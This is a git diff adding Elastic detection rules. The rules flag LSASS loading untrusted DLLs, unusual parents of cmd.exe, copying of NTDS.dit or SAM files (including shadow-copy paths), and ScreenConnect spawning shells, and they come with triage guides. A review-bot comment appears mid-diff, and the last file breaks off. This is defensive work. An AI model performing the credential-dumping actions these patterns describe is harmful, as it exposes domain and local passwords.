@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies LSASS loading an unsigned or untrusted DLL. Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.library-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Module Loaded by LSASS", + "query": "library where host.os.type == \"windows\" and process.executable : \"?:\\\\Windows\\\\System32\\\\lsass.exe\" and\n not (dll.code_signature.subject_name :\n (\"Microsoft Windows\",\n \"Microsoft Corporation\",\n \"Microsoft Windows Publisher\",\n \"Microsoft Windows Software Compatibility Publisher\",\n \"Microsoft Windows Hardware Compatibility Publisher\",\n \"McAfee, Inc.\",\n \"SecMaker AB\",\n \"HID Global Corporation\",\n \"HID Global\",\n \"Apple Inc.\",\n \"Citrix Systems, Inc.\",\n \"Dell Inc\",\n \"Hewlett-Packard Company\",\n \"Symantec Corporation\",\n \"National Instruments Corporation\",\n \"DigitalPersona, Inc.\",\n \"Novell, Inc.\",\n \"gemalto\",\n \"EasyAntiCheat Oy\",\n \"Entrust Datacard Corporation\",\n \"AuriStor, Inc.\",\n \"LogMeIn, Inc.\",\n \"VMware, Inc.\",\n \"Istituto Poligrafico e Zecca dello Stato S.p.A.\",\n \"Nubeva Technologies Ltd\",\n \"Micro Focus (US), Inc.\",\n \"Yubico AB\",\n \"GEMALTO SA\",\n \"Secure Endpoints, Inc.\",\n \"Sophos Ltd\",\n \"Morphisec Information Security 2014 Ltd\",\n \"Entrust, Inc.\",\n \"Nubeva Technologies Ltd\",\n \"Micro Focus (US), Inc.\",\n \"F5 Networks Inc\",\n \"Bit4id\",\n \"Thales DIS CPL USA, Inc.\",\n \"Micro Focus International plc\",\n \"HYPR Corp\",\n \"Intel(R) Software Development Products\",\n \"PGP Corporation\",\n \"Parallels International GmbH\",\n \"FrontRange Solutions Deutschland GmbH\",\n 
\"SecureLink, Inc.\",\n \"Tidexa OU\",\n \"Amazon Web Services, Inc.\",\n \"SentryBay Limited\",\n \"Audinate Pty Ltd\",\n \"CyberArk Software Ltd.\",\n \"McAfeeSysPrep\",\n \"NVIDIA Corporation PE Sign v2016\",\n \"Trend Micro, Inc.\",\n \"Fortinet Technologies (Canada) Inc.\",\n \"Carbon Black, Inc.\") and\n dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\")) and\n\n not dll.hash.sha256 :\n (\"811a03a5d7c03802676d2613d741be690b3461022ea925eb6b2651a5be740a4c\",\n \"1181542d9cfd63fb00c76242567446513e6773ea37db6211545629ba2ecf26a1\",\n \"ed6e735aa6233ed262f50f67585949712f1622751035db256811b4088c214ce3\",\n \"26be2e4383728eebe191c0ab19706188f0e9592add2e0bf86b37442083ae5e12\",\n \"9367e78b84ef30cf38ab27776605f2645e52e3f6e93369c674972b668a444faa\",\n \"d46cc934765c5ecd53867070f540e8d6f7701e834831c51c2b0552aba871921b\",\n \"0f77a3826d7a5cd0533990be0269d951a88a5c277bc47cff94553330b715ec61\",\n \"4aca034d3d85a9e9127b5d7a10882c2ef4c3e0daa3329ae2ac1d0797398695fb\",\n \"86031e69914d9d33c34c2f4ac4ae523cef855254d411f88ac26684265c981d95\")\n", + "references": [ + "https://blog.xpnsec.com/exploring-mimikatz-part-2/", + "https://github.com/jas502n/mimikat_ssp" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.hash.sha256", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3a6001a0-0939-4bbe-86f4-47d8faeb7b97", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not 
added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "3a6001a0-0939-4bbe-86f4-47d8faeb7b97_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_109.json b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_109.json new file mode 100644 index 00000000000..309a444bf97 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_109.json 
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious parent child process relationship with cmd.exe descending from an unusual process.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Parent Process for cmd.exe", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"cmd.exe\" and\n process.parent.name : (\"lsass.exe\",\n \"csrss.exe\",\n \"epad.exe\",\n \"regsvr32.exe\",\n \"dllhost.exe\",\n \"LogonUI.exe\",\n \"wermgr.exe\",\n \"spoolsv.exe\",\n \"jucheck.exe\",\n \"jusched.exe\",\n \"ctfmon.exe\",\n \"taskhostw.exe\",\n \"GoogleUpdate.exe\",\n \"sppsvc.exe\",\n \"sihost.exe\",\n \"slui.exe\",\n \"SIHClient.exe\",\n \"SearchIndexer.exe\",\n \"SearchProtocolHost.exe\",\n \"FlashPlayerUpdateService.exe\",\n \"WerFault.exe\",\n \"WUDFHost.exe\",\n \"unsecapp.exe\",\n \"wlanext.exe\" ) and\n not (process.parent.name : \"dllhost.exe\" and process.parent.args : \"/Processid:{CA8C87C1-929D-45BA-94DB-EF8E6CB346AD}\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3b47900d-e793-49e8-968f-c90dc3526aa1", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was 
not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "3b47900d-e793-49e8-968f-c90dc3526aa1_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_110.json b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_110.json new file mode 100644 index 00000000000..9cbf2255570 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_110.json 
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious parent child process relationship with cmd.exe descending from an unusual process.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Parent Process for cmd.exe", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"cmd.exe\" and\n process.parent.name : (\"lsass.exe\",\n \"csrss.exe\",\n \"epad.exe\",\n \"regsvr32.exe\",\n \"dllhost.exe\",\n \"LogonUI.exe\",\n \"wermgr.exe\",\n \"spoolsv.exe\",\n \"jucheck.exe\",\n \"jusched.exe\",\n \"ctfmon.exe\",\n \"taskhostw.exe\",\n \"GoogleUpdate.exe\",\n \"sppsvc.exe\",\n \"sihost.exe\",\n \"slui.exe\",\n \"SIHClient.exe\",\n \"SearchIndexer.exe\",\n \"SearchProtocolHost.exe\",\n \"FlashPlayerUpdateService.exe\",\n \"WerFault.exe\",\n \"WUDFHost.exe\",\n \"unsecapp.exe\",\n \"wlanext.exe\" ) and\n not (process.parent.name : \"dllhost.exe\" and process.parent.args : \"/Processid:{CA8C87C1-929D-45BA-94DB-EF8E6CB346AD}\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3b47900d-e793-49e8-968f-c90dc3526aa1", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL 
rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "3b47900d-e793-49e8-968f-c90dc3526aa1_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_111.json b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_111.json new file mode 100644 index 00000000000..802538f416d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_111.json 
@@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies a copy operation of the Active Directory Domain Database (ntds.dit) or Security Account Manager (SAM) files. Those files contain sensitive information including hashed domain and/or local credentials.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "NTDS or SAM Database File Copied", + "note": "## Triage and analysis\n\n### Investigating NTDS or SAM Database File Copied\n\nThe Active Directory Domain Database (ntds.dit) and Security Account Manager (SAM) files are critical components in Windows environments, containing sensitive information such as hashed domain and local credentials.\n\nThis rule identifies copy operations of these files using specific command-line tools, such as Cmd.Exe, PowerShell.EXE, XCOPY.EXE, and esentutl.exe. By monitoring for the presence of these tools and their associated arguments, the rule aims to detect potential credential access activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, command lines, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check for any recent changes in user account privileges or group memberships that may have allowed the unauthorized access.\n- Determine whether the file was potentially exfiltrated from the subject host.\n- Scope compromised credentials and disable the accounts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE 
'%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Look for the presence of relevant artifacts on other systems. Identify commonalities and differences between potentially compromised systems.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore the affected system to its operational state by applying any necessary patches, updates, or configuration changes.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n ((?process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\", \"XCOPY.EXE\") or process.name : (\"Cmd.Exe\", \"PowerShell.EXE\", \"XCOPY.EXE\")) and\n process.args : (\"copy\", \"xcopy\", \"Copy-Item\", \"move\", \"cp\", \"mv\")\n ) or\n ((?process.pe.original_file_name : \"esentutl.exe\" or process.name : \"esentutl.exe\") and process.args : (\"*/y*\", \"*/vss*\", \"*/d*\"))\n ) and\n process.command_line : (\"*\\\\ntds.dit*\", \"*\\\\config\\\\SAM*\", \"*\\\\*\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy*\\\\*\", \"*/system32/config/SAM*\", \"*\\\\User Data\\\\*\")\n", + "references": [ + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + 
"type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + }, + { + "id": "T1003.003", + "name": "NTDS", + "reference": "https://attack.mitre.org/techniques/T1003/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_112.json b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_112.json new file mode 100644 index 00000000000..3264811e6a0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_112.json 
@@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies a copy operation of the Active Directory Domain Database (ntds.dit) or Security Account Manager (SAM) files. Those files contain sensitive information including hashed domain and/or local credentials.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "NTDS or SAM Database File Copied", + "note": "## Triage and analysis\n\n### Investigating NTDS or SAM Database File Copied\n\nThe Active Directory Domain Database (ntds.dit) and Security Account Manager (SAM) files are critical components in Windows environments, containing sensitive information such as hashed domain and local credentials.\n\nThis rule identifies copy operations of these files using specific command-line tools, such as Cmd.Exe, PowerShell.EXE, XCOPY.EXE, and esentutl.exe. By monitoring for the presence of these tools and their associated arguments, the rule aims to detect potential credential access activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, command lines, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check for any recent changes in user account privileges or group memberships that may have allowed the unauthorized access.\n- Determine whether the file was potentially exfiltrated from the subject host.\n- Scope compromised credentials and disable the accounts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE 
'%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Look for the presence of relevant artifacts on other systems. Identify commonalities and differences between potentially compromised systems.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore the affected system to its operational state by applying any necessary patches, updates, or configuration changes.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n ((?process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\", \"XCOPY.EXE\") or process.name : (\"Cmd.Exe\", \"PowerShell.EXE\", \"XCOPY.EXE\")) and\n process.args : (\"copy\", \"xcopy\", \"Copy-Item\", \"move\", \"cp\", \"mv\")\n ) or\n ((?process.pe.original_file_name : \"esentutl.exe\" or process.name : \"esentutl.exe\") and process.args : (\"*/y*\", \"*/vss*\", \"*/d*\"))\n ) and\n process.command_line : (\"*\\\\ntds.dit*\", \"*\\\\config\\\\SAM*\", \"*\\\\*\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy*\\\\*\", \"*/system32/config/SAM*\", \"*\\\\User Data\\\\*\")\n", + "references": [ + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + 
"type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + }, + { + "id": "T1003.003", + "name": "NTDS", + "reference": "https://attack.mitre.org/techniques/T1003/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3d00feab-e203-4acc-a463-c3e15b7e9a73_1.json b/packages/security_detection_engine/kibana/security_rule/3d00feab-e203-4acc-a463-c3e15b7e9a73_1.json new file mode 100644 index 00000000000..4b44db896ac --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3d00feab-e203-4acc-a463-c3e15b7e9a73_1.json 
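Review bot: The `process.command_line` pattern `"*\\\\User Data\\\\*"` in the `query` matches copies of a `User Data` directory (typically a Chromium-based browser profile), which neither the rule `name` ("NTDS or SAM Database File Copied") nor the `description` mentions, so an analyst triaging such an alert finds nothing in the `note` explaining why it fired. Consider extending the description, e.g. `"... or Security Account Manager (SAM) files, or of a browser \"User Data\" profile directory. Those files contain sensitive information including hashed domain and/or local credentials."`, and adding a matching bullet under "Possible investigation steps". The visible part of the preceding `_111` hunk looks identical apart from `version`, which is presumably intentional for a packaged rule history, but only part of that hunk is in view.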
@@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious processes being spawned by the ScreenConnect server process (ScreenConnect.Service.exe). This activity may indicate exploitation activity or access to an existing web shell backdoor.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "logs-system.security*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ScreenConnect Server Spawning Suspicious Processes", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"ScreenConnect.Service.exe\" and\n (process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"csc.exe\") or\n ?process.pe.original_file_name in (\"cmd.exe\", \"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\"))\n", + "references": [ + "https://blackpointcyber.com/resources/blog/breaking-through-the-screen/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + 